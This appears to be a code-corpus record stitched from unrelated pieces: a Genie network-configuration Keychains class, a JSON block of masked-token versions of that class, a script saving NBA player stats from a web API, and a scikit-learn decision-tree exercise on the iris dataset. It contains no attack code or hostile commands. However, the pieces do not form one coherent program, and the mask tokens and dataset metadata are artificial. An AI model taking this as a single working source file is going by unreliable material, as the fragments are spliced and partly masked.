else:
return cfgs
def build_unconfig(self,
devices=None,
interfaces=None,
links=None,
apply=True,
attributes=None,
**kwargs):
attributes = AttributesHelper(self, attributes)
cfgs = {}
devices, interfaces, links = \
consolidate_feature_args(self, devices, interfaces, links)
for key, sub, attributes2 in attributes.mapping_items('device_attr',
keys=devices,
sort=True):
cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)
if apply:
for device_name, cfg in sorted(cfgs.items()):
self.testbed.config_on_devices(cfg, fail_invalid=True)
else:
return cfgs
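# A hedged usage sketch inferred from the attribute tree above (the device
# object and the key values are placeholders, not from the original module):
#
#   keychains = Keychains()
#   keychains.device_attr[dev].keychain_attr['kc-bgp'].key_id_attr['1'].\
#       key_string = 'cisco123'
#   keychains.device_attr[dev].ms_keychain_attr['kc-macsec'].key_id_attr['10'].\
#       crypto_algo = Keychains.CRYPTO_ALGO.aes_128_cmac
#   cfgs = keychains.build_config(apply=False)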
|
normal
|
{
"blob_id": "6d2581b83a2839dcbc644ca572b05b158d80b58d",
"index": 2479,
"step-1": "<mask token>\n\n\nclass Keychains(DeviceFeature):\n <mask token>\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n <mask token>\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n <mask token>\n <mask token>\n <mask token>\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n <mask token>\n <mask token>\n <mask token>\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in 
attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-2": "<mask token>\n\n\nclass Keychains(DeviceFeature):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n device_attr = managedattribute(name='device_attr', read_only=True, doc=\n DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n key_id = managedattribute(name='key_id', default=None, type=(None,\n managedattribute.test_istype(str)), doc='Configure a key')\n key_enc_type = managedattribute(name='key_enc_type', default=None, type\n =managedattribute.test_istype(int), doc='Set key encode type')\n key_string = managedattribute(name='key_string', default=None, type=(\n None, managedattribute.test_istype(str)), doc='Set key string')\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n crypto_algo = managedattribute(name='crypto_algo', default=None, type=(\n None, CRYPTO_ALGO), doc='Set cryptographic authentication algorithm')\n lifetime_start = managedattribute(name='lifetime_start', default=None,\n type=(None, managedattribute.test_istype(str)), doc=\n 'Set start time for sending lifetime of encryption key')\n lifetime_duration = managedattribute(name='lifetime_duration', default=\n None, 
type=(None, managedattribute.test_istype(int)), doc=\n 'Set key lifetime duration')\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-3": "<mask token>\n__all__ = 'Keychains',\n\n\nclass Keychains(DeviceFeature):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n device_attr = managedattribute(name='device_attr', read_only=True, doc=\n DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n key_id = managedattribute(name='key_id', default=None, type=(None,\n managedattribute.test_istype(str)), doc='Configure a key')\n key_enc_type = managedattribute(name='key_enc_type', default=None, type\n =managedattribute.test_istype(int), doc='Set key encode type')\n key_string = managedattribute(name='key_string', default=None, type=(\n None, managedattribute.test_istype(str)), doc='Set key string')\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n crypto_algo = managedattribute(name='crypto_algo', default=None, type=(\n None, CRYPTO_ALGO), doc='Set cryptographic authentication algorithm')\n lifetime_start = managedattribute(name='lifetime_start', default=None,\n type=(None, managedattribute.test_istype(str)), doc=\n 'Set start time for sending lifetime of encryption key')\n lifetime_duration = 
managedattribute(name='lifetime_duration', default=\n None, type=(None, managedattribute.test_istype(int)), doc=\n 'Set key lifetime duration')\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-4": "from enum import Enum\nfrom genie.decorator import managedattribute\nfrom genie.conf.base import Base, DeviceFeature, LinkFeature, Interface\nimport genie.conf.base.attributes\nfrom genie.libs.conf.base.feature import consolidate_feature_args\nfrom genie.conf.base.attributes import SubAttributes, SubAttributesDict, AttributesHelper, KeyedSubAttributes\nfrom genie.conf.base.attributes import InterfaceSubAttributes\nfrom genie.libs import parser\nfrom genie.abstract import Lookup\nfrom genie.ops.base import Base as ops_Base\nfrom genie.ops.base import Context\n__all__ = 'Keychains',\n\n\nclass Keychains(DeviceFeature):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n\n class KeyChainAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n keychain_attr = managedattribute(name='keychain_attr', read_only=\n True, doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n ms_keychain_attr = managedattribute(name='ms_keychain_attr',\n read_only=True, doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes, parent=self\n )\n\n\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n\n class KeyIdAttributes(KeyedSubAttributes):\n\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n key_id_attr = managedattribute(name='key_id_attr', read_only=\n True, doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n te_keychain_attr = managedattribute(name='te_keychain_attr',\n read_only=True, doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes, parent=self\n )\n device_attr = managedattribute(name='device_attr', read_only=True, doc=\n DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n key_id = managedattribute(name='key_id', default=None, type=(None,\n managedattribute.test_istype(str)), doc='Configure a key')\n key_enc_type = managedattribute(name='key_enc_type', default=None, type\n =managedattribute.test_istype(int), doc='Set key encode type')\n key_string = managedattribute(name='key_string', default=None, type=(\n 
None, managedattribute.test_istype(str)), doc='Set key string')\n\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n crypto_algo = managedattribute(name='crypto_algo', default=None, type=(\n None, CRYPTO_ALGO), doc='Set cryptographic authentication algorithm')\n lifetime_start = managedattribute(name='lifetime_start', default=None,\n type=(None, managedattribute.test_istype(str)), doc=\n 'Set start time for sending lifetime of encryption key')\n lifetime_duration = managedattribute(name='lifetime_duration', default=\n None, type=(None, managedattribute.test_istype(int)), doc=\n 'Set key lifetime duration')\n\n def build_config(self, devices=None, interfaces=None, links=None, apply\n =True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self, devices=None, interfaces=None, links=None,\n apply=True, attributes=None, **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n devices, interfaces, links = consolidate_feature_args(self, devices,\n interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices, sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-5": "from enum import Enum\n\n# Genie\nfrom genie.decorator import managedattribute\nfrom genie.conf.base import Base, \\\n DeviceFeature, \\\n LinkFeature, \\\n Interface\nimport genie.conf.base.attributes\nfrom genie.libs.conf.base.feature import consolidate_feature_args\nfrom genie.conf.base.attributes import SubAttributes, \\\n SubAttributesDict, \\\n AttributesHelper, \\\n KeyedSubAttributes\nfrom genie.conf.base.attributes import InterfaceSubAttributes\nfrom genie.libs import parser\nfrom genie.abstract import Lookup\nfrom genie.ops.base import Base as ops_Base\nfrom genie.ops.base import Context\n\n__all__ = ('Keychains', )\n# Structure Hierarchy:\n# Keychains\n# +--DeviceAttributes\n# +-- KeyChainAttributes\n# | +-- KeyIdAttributes\n# +-- KeyChainMacSecAttributes\n# | +-- KeyIdAttributes\n# +-- KeyChainTunEncAttributes\n# +-- KeyIdAttributes\n\n\nclass Keychains(DeviceFeature):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # =============================================\n # Device attributes\n # =============================================\n class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes):\n\n # KeyChainAttributes\n class KeyChainAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_chain = key\n super().__init__(parent)\n\n # KeyIdAttributes\n class KeyIdAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n\n key_id_attr = managedattribute(name='key_id_attr',\n read_only=True,\n doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n\n keychain_attr = managedattribute(name='keychain_attr',\n read_only=True,\n doc=KeyChainAttributes.__doc__)\n\n @keychain_attr.initter\n def keychain_attr(self):\n return SubAttributesDict(self.KeyChainAttributes, parent=self)\n\n # KeyChainMacSecAttributes\n class KeyChainMacSecAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.ms_key_chain = key\n super().__init__(parent)\n\n # KeyIdAttributes\n class KeyIdAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n\n key_id_attr = managedattribute(name='key_id_attr',\n read_only=True,\n doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n\n ms_keychain_attr = managedattribute(\n name='ms_keychain_attr',\n read_only=True,\n doc=KeyChainMacSecAttributes.__doc__)\n\n @ms_keychain_attr.initter\n def ms_keychain_attr(self):\n return SubAttributesDict(self.KeyChainMacSecAttributes,\n parent=self)\n\n # KeyChainTunEncAttributes\n class KeyChainTunEncAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.te_key_chain = key\n super().__init__(parent)\n\n # KeyIdAttributes\n class KeyIdAttributes(KeyedSubAttributes):\n def __init__(self, parent, key):\n self.key_id = key\n super().__init__(parent)\n\n key_id_attr = managedattribute(name='key_id_attr',\n read_only=True,\n doc=KeyIdAttributes.__doc__)\n\n @key_id_attr.initter\n def key_id_attr(self):\n return SubAttributesDict(self.KeyIdAttributes, parent=self)\n\n te_keychain_attr = managedattribute(\n name='te_keychain_attr',\n read_only=True,\n doc=KeyChainTunEncAttributes.__doc__)\n\n @te_keychain_attr.initter\n def te_keychain_attr(self):\n return SubAttributesDict(self.KeyChainTunEncAttributes,\n parent=self)\n\n device_attr = 
managedattribute(name='device_attr',\n read_only=True,\n doc=DeviceAttributes.__doc__)\n\n @device_attr.initter\n def device_attr(self):\n return SubAttributesDict(self.DeviceAttributes, parent=self)\n\n # ============ managedattributes ============#\n key_id = managedattribute(name='key_id',\n default=None,\n type=(None, managedattribute.test_istype(str)),\n doc='Configure a key')\n\n key_enc_type = managedattribute(name='key_enc_type',\n default=None,\n type=managedattribute.test_istype(int),\n doc='Set key encode type')\n\n key_string = managedattribute(name='key_string',\n default=None,\n type=(None,\n managedattribute.test_istype(str)),\n doc='Set key string')\n\n class CRYPTO_ALGO(Enum):\n aes_128_cmac = 'aes-128-cmac'\n aes_256_cmac = 'aes-256-cmac'\n\n crypto_algo = managedattribute(\n name='crypto_algo',\n default=None,\n type=(None, CRYPTO_ALGO),\n doc='Set cryptographic authentication algorithm')\n\n lifetime_start = managedattribute(\n name='lifetime_start',\n default=None,\n type=(None, managedattribute.test_istype(str)),\n doc='Set start time for sending lifetime of encryption key')\n\n lifetime_duration = managedattribute(\n name='lifetime_duration',\n default=None,\n type=(None, managedattribute.test_istype(int)),\n doc='Set key lifetime duration')\n\n # =========================================================\n # build_config\n # =========================================================\n def build_config(self,\n devices=None,\n interfaces=None,\n links=None,\n apply=True,\n attributes=None,\n **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n\n devices, interfaces, links = \\\n consolidate_feature_args(self, devices, interfaces, links)\n\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices,\n sort=True):\n cfgs[key] = sub.build_config(apply=False, attributes=attributes2)\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n\n def build_unconfig(self,\n devices=None,\n interfaces=None,\n links=None,\n apply=True,\n attributes=None,\n **kwargs):\n attributes = AttributesHelper(self, attributes)\n cfgs = {}\n\n devices, interfaces, links = \\\n consolidate_feature_args(self, devices, interfaces, links)\n for key, sub, attributes2 in attributes.mapping_items('device_attr',\n keys=devices,\n sort=True):\n cfgs[key] = sub.build_unconfig(apply=False, attributes=attributes2)\n\n if apply:\n for device_name, cfg in sorted(cfgs.items()):\n self.testbed.config_on_devices(cfg, fail_invalid=True)\n else:\n return cfgs\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
# getting a sample of data to parse for the keys of the players
import requests
import xml.etree.ElementTree as ET
currentPlayerInfoUrl="http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16"
r=requests.get(currentPlayerInfoUrl)
if r.status_code == requests.codes.ok:
    with open('currentPlayerDump.json','w') as f:
        f.write(r.text)  # write the whole JSON payload; looping over r.text would iterate characters, not lines
|
normal
|
{
"blob_id": "68f8b301d86659f9d76de443b0afe93fd7f7e8c2",
"index": 6588,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif r.status_code == requests.codes.ok:\n with open('currentPlayerDump.json', 'w') as f:\n for line in r.text:\n f.write(line)\n",
"step-3": "<mask token>\ncurrentPlayerInfoUrl = (\n 'http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16'\n )\nr = requests.get(currentPlayerInfoUrl)\nif r.status_code == requests.codes.ok:\n with open('currentPlayerDump.json', 'w') as f:\n for line in r.text:\n f.write(line)\n",
"step-4": "import requests\nimport xml.etree.ElementTree as ET\ncurrentPlayerInfoUrl = (\n 'http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16'\n )\nr = requests.get(currentPlayerInfoUrl)\nif r.status_code == requests.codes.ok:\n with open('currentPlayerDump.json', 'w') as f:\n for line in r.text:\n f.write(line)\n",
"step-5": "# getting a sample of data to parse for the keys of the players\nimport requests\nimport xml.etree.ElementTree as ET\n\ncurrentPlayerInfoUrl=\"http://stats.nba.com/stats/commonallplayers?IsOnlyCurrentSeason=1&LeagueID=00&Season=2015-16\"\n\nr=requests.get(currentPlayerInfoUrl)\nif r.status_code == requests.codes.ok:\n\twith open('currentPlayerDump.json','w') as f:\n\t\tfor line in r.text:\n\t\t\tf.write(line)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import cross_val_score
iris_dataset=load_iris()
X=iris_dataset['data']
y=iris_dataset['target']
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.1,stratify=y,random_state=42)
model=[]
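# fit ten trees that are identical except for random_state, to see how the seed affects accuracy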
for c in range(1,11):
tree=DecisionTreeClassifier(max_depth=4,random_state=c)
model.append(tree.fit(X_train,y_train))
in_sample_accuracy=[]
out_of_sample_accuracy=[]
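# score every fitted tree on the training set (in-sample) and the held-out test set (out-of-sample)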
for a in model:
in_sample_accuracy.append(a.score(X_train,y_train))
out_of_sample_accuracy.append(a.score(X_test,y_test))
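# column labels 1..10 plus 'mean' and 'standard'; append the matching summary statistics to each list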
a=list(range(1,11))
a.append('mean')
a.append('standard')
in_sample_accuracy.append(np.mean(in_sample_accuracy))
in_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))
out_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))
out_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))
b=pd.DataFrame([in_sample_accuracy,out_of_sample_accuracy,],
columns=a,index=['in_sample_accuracy','out_of_sample_accuracy'])
pd.set_option('display.precision',3)
b
#cross validation
CVS=[]
score=cross_val_score(DecisionTreeClassifier(max_depth=4),X_train,y_train,cv=10)
CVS.append(score)
pd.set_option('display.precision',3)
c=pd.DataFrame(CVS,columns=['result1','result2','result3','result4','result5','result6','result7','result8','result9','result10'],)
c['mean']=c.mean(1)
c['standard']=c.std(1)
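# refit one tree on the training data and report its test accuracy next to the cross-validation scores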
dt=DecisionTreeClassifier(max_depth=4)
dt.fit(X_train,y_train)
c['Out-of-sample-accuracy']=dt.score(X_test,y_test)
c
print("My name is Fengkai Xu")
print("My NetID is: fengkai4")
print("I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.")
|
normal
|
{
"blob_id": "cc46485a3b5c68e4f77a2f9a033fd2ee2859b52b",
"index": 978,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor c in range(1, 11):\n tree = DecisionTreeClassifier(max_depth=4, random_state=c)\n model.append(tree.fit(X_train, y_train))\n<mask token>\nfor a in model:\n in_sample_accuracy.append(a.score(X_train, y_train))\n out_of_sample_accuracy.append(a.score(X_test, y_test))\n<mask token>\na.append('mean')\na.append('standard')\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\n<mask token>\npd.set_option('precision', 3)\nb\n<mask token>\nCVS.append(score)\npd.set_option('precision', 3)\n<mask token>\ndt.fit(X_train, y_train)\n<mask token>\nc\nprint('My name is Fengkai Xu')\nprint('My NetID is: fengkai4')\nprint(\n 'I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.'\n )\n",
